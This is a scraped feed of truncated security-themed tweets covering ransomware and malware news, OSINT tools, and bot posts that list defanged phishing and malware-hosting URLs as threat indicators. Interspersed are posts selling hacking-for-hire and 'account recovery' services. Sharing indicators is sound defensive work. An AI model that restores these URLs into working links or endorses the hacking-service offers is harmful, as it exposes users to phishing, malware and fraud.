JackOfAllTechs: Cybersecurity organizations fight back against rise of emotet and omnatuor malvertising https://t.co/khY7CuHRVT… https://t.co/GRf1Cert0e -- JackOfAllTechs
marciasgreen: RT @reach2ratan: Google Fi Users Caught Up in T-Mobile Breach https://t.co/lS9S7opW4O #CyberSecurity #hacker #infosec @reach2ratan #secur… -- marciasgreen
mbalchaitis: RT @SonicWall: SonicWall Real-Time Deep Memory Inspection (#RTDMI) technology found more never-before-seen #malware than ever before. Get a… -- mbalchaitis
noladefense: #phishing Website Detected #infosec #cybersecurity #scam #フィッシング詐欺 #偽サイト URL: hxxps://phpstack-930414-3229089[.]cl… https://t.co/Ydvsyo5zEA -- noladefense
noladefense: #phishing Website Detected #infosec #cybersecurity #scam #フィッシング詐欺 #偽サイト URL: hxxps://x626[.]co/aaa/office-RD117%2… https://t.co/xdAKxGGBr5 -- noladefense
noladefense: #phishing Website Detected #infosec #cybersecurity #scam #フィッシング詐欺 #偽サイト URL: hxxps://misew[.]z13[.]web[.]core[.]w… https://t.co/ooJ2dZujt7 -- noladefense
noladefense: #phishing Website Detected #infosec #cybersecurity #scam #フィッシング詐欺 #偽サイト URL: hxxps://s[.]smcbazmsoaru[.]icu/ IP:… https://t.co/040nIjyhfh -- noladefense
rsnksg: RT @TrustedSec: Threat actors have used #OneNote files to execute attacks before, but we’ve found this technique to be more and more common… -- rsnksg
sectest9: RT @noladefense: #phishing Website Detected #infosec #cybersecurity #scam #フィッシング詐欺 #偽サイト URL: hxxps://determined-clarke[.]34-134-130-193[… -- sectest9
sectest9: RT @threatshub: ThreatsHub Cybersecurity News | Monthly Threat Webinar Series in 2023: What to Expect - https://t.co/QK8EL5kOmD #CyberSecur… -- sectest9
sectest9: RT @NandanLohitaksh: 18 Threat Hunting and OSINT Tools 🔥 1. https://t.co/PIptJzaOSj - Search for devices connected to the internet and the… -- sectest9
sectest9: RT @CyberGuardNews: Ukrainian organisations getting hit by destructive new SwiftSlicer #malware https://t.co/PupL4SoqLt #Sec_Cyber -- sectest9
alirehmanups: RT @SecurityTrybe: Cybersecurity Attack Vectors #infosecurity #cyberattacks #cyber #Hacked #Hacking #cybercrime https://t.co/WNSxCOlHT3 -- alirehmanups
andreassebayg: RT @three_cube: Open Source Intelligence (OSINT): Finding Email Passwords in Dumps with h8mail #osint #h8mail #infosec #cybersecurity #cybe… -- andreassebayg
andrewmorrisuk: RT @Experthac_Gary1: Is mandatory password expiration helping or hurting your password security? 📌https://t.co/wxkGFAQEqM #DataSecurity #… -- andrewmorrisuk
AnonGray19: RT @brcyrr: Today I have a great checklist suggestion for Web Application Penetration Testing❗️🤩 I definitely suggest adding this list to y… -- AnonGray19
AshleyW00929254: RT @RESecurity: Resecurity® has identified a relatively new #ransomware family called “Nevada Ransomware”. On February 1st, the operators b… -- AshleyW00929254
AtomSpam: Detected #phishing clone at address: hxxp://paypl-s[.]com/ #paypal #infosec #cybersecurity #atomspam Follow us… https://t.co/E6jmWNvoKi -- AtomSpam
batallionusa: RT @Nostalgicbrain0: Tnx@three_cube Open Source Intelligence (OSINT): Finding Usernames Across Multiple Platforms #osint #reconng #infosec… -- batallionusa
beefyspace: RT @Experthac_Gary1: CISO Cheat Sheet #infosec #cybersecurity #cybersecuritytips #pentesting #oscp #redteam #informationsecurity #cissp… -- beefyspace
beefyspace: RT @cybernewslive: @ArnoldClark latest victim of Play #Ransomware Group #CNL #CyberNewsLive #Cyber #CyberSecurity #CyberSecurityNews #Cybe… -- beefyspace
beefyspace: RT @DailyOsint: If you need a fast and effective port scanner, You can try #RustScan, which is able to scan all ports in 3 seconds. https… -- beefyspace
BHordunayo: RT @three_cube: Open Source Intelligence (OSINT): Finding Email Passwords in Dumps with h8mail #osint #h8mail #infosec #cybersecurity #cybe… -- BHordunayo
christinayiotis: “A #Ransomware attack forced the closure Tuesday of four public #Schools serving 1,700 students on the island of… https://t.co/kHNkO3heJM -- christinayiotis
CyberSecurityN8: RT @programmerjoke9: It did happen like that#100Daysofcode #javascript #programming #dev #linux #java #programming #CodeNewbie #python #rea… -- CyberSecurityN8
CyberSecurityN8: RT @Cyberdost: Today is the 1st Wednesday of the month and it is Cyber Awareness Day! Do your part to become cyber smart by achieving all o… -- CyberSecurityN8
CyberSecurityN8: RT @CraigEMcDonald: Beware of any emails that state, “Your Medicare claims and payment are now available for filing and disbursement”. The… -- CyberSecurityN8
CyberSecurityN8: RT @StanleyEpstein: Maryland hospital facing outages after 'significant' ransomware attack #Ransomware via https://t.co/eBW8Lmmpx7 https://… -- CyberSecurityN8
CyberSecurityN8: RT @ultra_lutra1: Meet HeadCrab - a new Linux malware utilizing Redis modules to compromise exposed servers. We uncovered this complex mal… -- CyberSecurityN8
databreach9111: RT @Experthac_Gary1: Is mandatory password expiration helping or hurting your password security? 📌https://t.co/wxkGFAQEqM #DataSecurity #… -- databreach9111
ecarlesi: Possible threat on hxxp://nwn-impact[.]org/modx-3[.]0[.]3-pl[.]zip #phishing #opendir -- ecarlesi
ecarlesi: Possible threat on hxxp://nwn-impact[.]org/modx-3[.]0[.]3-pl[.]zip #phishing #opendir https://t.co/qwXl0SELUA -- ecarlesi
ecarlesi: Threat on hxxps://kyqph[.]win:8443/index[.]html?shareName=kyqph[.]win #malware #godaddy https://t.co/ja6rRvZQjo -- ecarlesi
el03lotito: RT @cyb_detective: https://t.co/rp5eE9xQLJ Attack surface database of the entire Internet. Search info by domain, ip, technology, host,… -- el03lotito
Experthac_Gary1: Have your exclusive Hacking jobs? DM and Ask for my service... #hacked #icloud #facebookdown #imessage #ransomware… https://t.co/bm91e4jmof -- Experthac_Gary1
Experthac_Gary1: Hacking is way Easier when you contact the right hacker. Inbox me now for all your hacking services I'm available… https://t.co/DoPCdp4FIz -- Experthac_Gary1
Experthac_Gary1: Inbox now for help and guide on how to recover lost accounts #hacked #icloud #facebookdown #imessage #ransomware… https://t.co/58Q9tXe1wZ -- Experthac_Gary1
gdprAI: RT @Experthac_Gary1: Is mandatory password expiration helping or hurting your password security? 📌https://t.co/wxkGFAQEqM #DataSecurity #… -- gdprAI
idanr86: RT @ultra_lutra1: Meet HeadCrab - a new Linux malware utilizing Redis modules to compromise exposed servers. We uncovered this complex mal… -- idanr86
IdentityIQ: Oh wow! One-third of people in the U.S. have experienced some form of identity theft. 😨 What do you do to help pro… https://t.co/SB7wpu9RxE -- IdentityIQ
iquechocosa: RT @Experthac_Gary1: CISO Cheat Sheet #infosec #cybersecurity #cybersecuritytips #pentesting #oscp #redteam #informationsecurity #cissp… -- iquechocosa
iquechocosa: RT @osintcombine: [#OSINT Tools] We've updated our bookmark stack to include important tools to conduct fact-checking &amp; verification, and o… -- iquechocosa
itspetemorgan: RT @LouiswLang: 1/2 @phylum_io has identified new #malware pkg masquerading as #angular recently published to #npm. https://t.co/GzlC8HxpI… -- itspetemorgan
jayeshmthakur: RT @NonprofitGood: Marqeta makes first acquisition, buys Power Finance for $275 million https://t.co/L0erMhn6Ax #efani #StopTracking #BTC… -- jayeshmthakur
jayeshmthakur: RT @DailyOsint: If you need a fast and effective port scanner, You can try #RustScan, which is able to scan all ports in 3 seconds. https… -- jayeshmthakur
jayeshmthakur: RT @bartmcd: #Hackers interrupted online #PC play for @RockstarGTAV #gamers. via @HackRead https://t.co/6pJhn72DBJ #cybersecurity #cyberawa… -- jayeshmthakur
jayeshmthakur: RT @tehtris: #ThreatIntel #Honeypots🍯 Bi-monthly report 👉 https://t.co/yQpKmJ8dBW 💥 IP conducting malicious activities, precise health da… -- jayeshmthakur
jayeshmthakur: RT @DFIRSummit: And that is wrap! Thank you to our Advisory Board, Chairs, Speakers , SANS Staff &amp; attendees of this year's #CTISummit. We… -- jayeshmthakur
jayeshmthakur: RT @Tessian: Question: What's the most sophisticated #cyberattack you've ever seen? We asked a range of experts, here's what they said...… -- jayeshmthakur
kmscom6: The #cybercrime job market is bustling. @Kaspersky found that some hacking groups are offering developers upwards o… https://t.co/cWSVB1Dz3v -- kmscom6
Manohar_k_18: RT @R29k_: 1- Found a support page. 2- It had Name,email and message fields 3- There was an option for saving your info, selecting it will… -- Manohar_k_18
MargaretHollin1: RT @CraigEMcDonald: Beware of any emails that state, “Your Medicare claims and payment are now available for filing and disbursement”. The… -- MargaretHollin1
Mazt0r: RT @bughunty: Github dorks for finding information using extension #bugbounty #bugbountytips #cybersecurity #pentesting #hacking https://t… -- Mazt0r
noladefense: #phishing Website Detected #infosec #cybersecurity #scam #フィッシング詐欺 #偽サイト URL: hxxps://eassal[.]net//storage/logs/n… https://t.co/eOLmsWroA8 -- noladefense
NonprofitGood: 'We're leveling up': Anchorage Digital Bank restructures https://t.co/dZnEqVPMdx #efani #StopTracking #BTC #Solar… https://t.co/BT8s8RMm9J -- NonprofitGood
PythonRoboto: RT @Experthac_Gary1: Is mandatory password expiration helping or hurting your password security? 📌https://t.co/wxkGFAQEqM #DataSecurity #… -- PythonRoboto
R3ap3R_007: RT @three_cube: Open Source Intelligence (OSINT): Finding Email Passwords in Dumps with h8mail #osint #h8mail #infosec #cybersecurity #cybe… -- R3ap3R_007
RDSWEB: RT @DailyOsint: If you need a fast and effective port scanner, You can try #RustScan, which is able to scan all ports in 3 seconds. https… -- RDSWEB
RealCoinGeek_IN: Based on #Chainalysis' report, while only $457 million were extorted from #ransomware victims in 2022, a huge dip f… https://t.co/LdV8OoVwlu -- RealCoinGeek_IN
realpeoplefind: RT @Nostalgicbrain0: Tnx@three_cube Open Source Intelligence (OSINT): Finding Usernames Across Multiple Platforms #osint #reconng #infosec… -- realpeoplefind
RksDtf: RT @Cyberdost: Today is the 1st Wednesday of the month and it is Cyber Awareness Day! Do your part to become cyber smart by achieving all o… -- RksDtf
sectest9: RT @brcyrr: Today I have a great checklist suggestion for Web Application Penetration Testing❗️🤩 I definitely suggest adding this list to y… -- sectest9
sectest9: RT @programmerjoke9: It did happen like that#100Daysofcode #javascript #programming #dev #linux #java #programming #CodeNewbie #python #rea… -- sectest9
sectest9: RT @IdentityIQ: Oh wow! One-third of people in the U.S. have experienced some form of identity theft. 😨 What do you do to help protect you… -- sectest9
sectest9: RT @LouiswLang: 1/2 @phylum_io has identified new #malware pkg masquerading as #angular recently published to #npm. https://t.co/GzlC8HxpI… -- sectest9
sectest9: RT @bartmcd: #Hackers interrupted online #PC play for @RockstarGTAV #gamers. via @HackRead https://t.co/6pJhn72DBJ #cybersecurity #cyberawa… -- sectest9
StanleyEpstein: Maryland hospital facing outages after 'significant' ransomware attack #Ransomware via https://t.co/eBW8Lmmpx7 https://t.co/2v6VlY1SM5 -- StanleyEpstein
thepixeldevs: RT @programmerjoke9: It did happen like that#100Daysofcode #javascript #programming #dev #linux #java #programming #CodeNewbie #python #rea… -- thepixeldevs
three_cube: RT @Nostalgicbrain0: Tnx@three_cube Open Source Intelligence (OSINT): Finding Usernames Across Multiple Platforms #osint #reconng #infosec… -- three_cube
Tooeasyx: RT @three_cube: OSINT is playing a key role in saving Ukraine. Learn to use it here. Hackers-Arise has One of the largest repositories of… -- Tooeasyx
Y1ngSec: RT @yxw21: New XSS platform released. Support using your own domain name. Support webhook. Mates with the burpsuite extension to log the fu… -- Y1ngSec
iBoostUp: iBoostUp Spyware Doctor cloud detected macOS #malware Trojan.Conduit in LaCiotat, France. #Infection was in a file… https://t.co/JOVeOYzqKU -- iBoostUp
nextopsol: RT @InstaSafe: Cybersecurity Issues Faced, By The Fintech Industry! Let's read a glimpse of it; Read to know more... https://t.co/vcozdzAx… -- nextopsol
sectest9: RT @InstaSafe: Cybersecurity Issues Faced, By The Fintech Industry! Let's read a glimpse of it; Read to know more... https://t.co/vcozdzAx… -- sectest9
247CTF: RT @0xnirob: Earned More than $10000 in bounties, successfully hacked 11 company. want to learn more about 'Dependency Confusion' attack? T… -- 247CTF
AcooEdi: RT @AcooEdi: A week in security (January 23—29) https://t.co/oLyWjxSGio #News #TMobile #ransomware #Microsoft #TikTok via Malwarebytes http… -- AcooEdi
alternative200: RT @DailyOsint: If you need a fast and effective port scanner, You can try #RustScan, which is able to scan all ports in 3 seconds. https… -- alternative200
alternative200: RT @three_cube: Open Source Intelligence (OSINT): Finding Email Passwords in Dumps with h8mail #osint #h8mail #infosec #cybersecurity #cybe… -- alternative200
Cyber_O51NT: New Nevada #Ransomware targets Windows and VMware ESXi systems https://t.co/yH9o4HBpDz -- Cyber_O51NT
Cyberpunker17: Want to decrypt a social media message to prank your friend? Dm for a professional exclusive and confidential servi… https://t.co/o4AzV5vKda -- Cyberpunker17
Cyberpunker17: Dm for easy way to recover your lost logging details #email #passcode #walletphrase #recoveryphrase #facebook… https://t.co/y4C1dbaJXf -- Cyberpunker17
CyberSecurityN8: RT @Cyberpunker17: Dm for easy way to recover your lost logging details #email #passcode #walletphrase #recoveryphrase #facebook #twitter… -- CyberSecurityN8
CyberSecurityN8: RT @Joneshacksit: For #Hacked #Gmail recovery Dm now #Hackedgmail #CyberSecurity #hacker #infosec @reach2ratan #security #cyber #tech #open… -- CyberSecurityN8
CyberSecurityN8: RT @cybernewslive: @ArnoldClark latest victim of Play #Ransomware Group #CNL #CyberNewsLive #Cyber #CyberSecurity #CyberSecurityNews #Cybe… -- CyberSecurityN8
CyberSecurityN8: RT @rajraman786: Amazing blog for solving SSL connection errors while intercepting requests from android 7+ devices. https://t.co/mxxLSqcrh… -- CyberSecurityN8
CyberSecurityN8: RT @KingDanjay: Text me now for any hacking or bypass Active 24/7 Upgrade and Account Recoveries. #cybercrime #programmer #malware #cybera… -- CyberSecurityN8
ecarlesi: Threat on hxxps://fxcryptoexpert[.]com/app[.]zip #phishing #opendir https://t.co/lyy42hD51a -- ecarlesi
ecarlesi: Threat on hxxp://saint-played-itlive[.]com/P[.]zip #phishing #opendir #namesilo https://t.co/A61OCv3k9O -- ecarlesi
fancy_4n6: RT @cosiveco: Ever wanted to spend 30 minutes picking the brain of a threat intelligence expert? Well, here's the next best thing. #threa… -- fancy_4n6
JEMPradio: Circles Around The Sun - Halicarnassus #Phish #JEMPRadio #CommunityRadio #NowPlaying https://t.co/Bz9yNRAZtE -- JEMPradio
Joneshacksit: For #Hacked #Gmail recovery Dm now #Hackedgmail #CyberSecurity #hacker #infosec @reach2ratan #security #cyber #tech… https://t.co/hqJKPNIaDa -- Joneshacksit
Joneshacksit: For Hacking or any Recovery services, Dm now! #CyberSecurity #hacker #infosec @reach2ratan #security #cyber #tech… https://t.co/tdkjSumEZO -- Joneshacksit
Joneshacksit: For support and help, contact your favorite #Hacker fast and reliable. All social media. #CyberSecurity #hacker… https://t.co/XjbSj31WyS -- Joneshacksit
lime7mars: RT @intigriti: Plenty of game hacking #bugbounty programs these days 👀 Time to learn the basics? Let's start with Cheat Engine 🎮 https://… -- lime7mars
loaykoshak: RT @SecurityTrybe: Cybersecurity Attack Vectors #infosecurity #cyberattacks #cyber #Hacked #Hacking #cybercrime https://t.co/WNSxCOlHT3 -- loaykoshak